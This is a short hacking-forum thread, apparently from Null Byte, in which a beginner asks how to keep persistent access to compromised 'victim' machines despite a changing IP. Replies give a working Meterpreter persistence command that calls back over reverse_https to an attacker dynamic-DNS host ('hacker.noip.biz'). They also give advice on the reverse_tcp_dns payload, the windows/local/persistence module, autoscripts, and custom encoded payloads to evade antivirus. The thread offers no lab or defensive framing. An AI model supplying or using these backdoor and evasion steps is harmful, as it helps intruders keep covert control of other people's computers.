Forum Thread: Persistent Backdoor QuestioN

Hello guys,

Rookie here, so i was watching OTW series, and i have a couple of questions,

lets imagine that i want to compromise some machines, and i want to have a persistent acess to it, in a WAN and LAN environment, since when you make a payload the LHOST cant be changed after being executed in the victim machine so how can I resolve this problem, and other thing in a WAN environment i dont have a fixed public IP so how can i workarround this, since my ip changes.

Ty for your time

Never Miss a Hacking or Security Guide

New Null Byte in your inbox, every week.

5 Responses

use noip and after compromising the system execute persistence.
example of the command i use after i get a meterpreter session in WAN environment:
run persistence –A –L C:\\ -P windows/meterpreter/reverse_https -X 30 –p 443 –r hacker.noip.biz

ty man, and btw in lan environment can i dynamically change the private IP? i guess not but maybe you guys know something that i dont

You can just set that as an autoscript so that when you get the meterpreter shell it automatically executes (in case you arent near your computer when the shell opens)

If you want the meterpreter to resolve your no-ip adress you need to use meterpreter reverse_tcp_dns. And for the persistence you better use exploit/windows/local/persistence module since the integrated persistence in meterpreter is definitely going to be detected if the victim has any AV. use EXE::Custom advanced option to deliver an encoded or special payload that is better in evading the AV. -Ne-py

Seems good, ty for your time

Share Your Thoughts

  • Hot
  • Active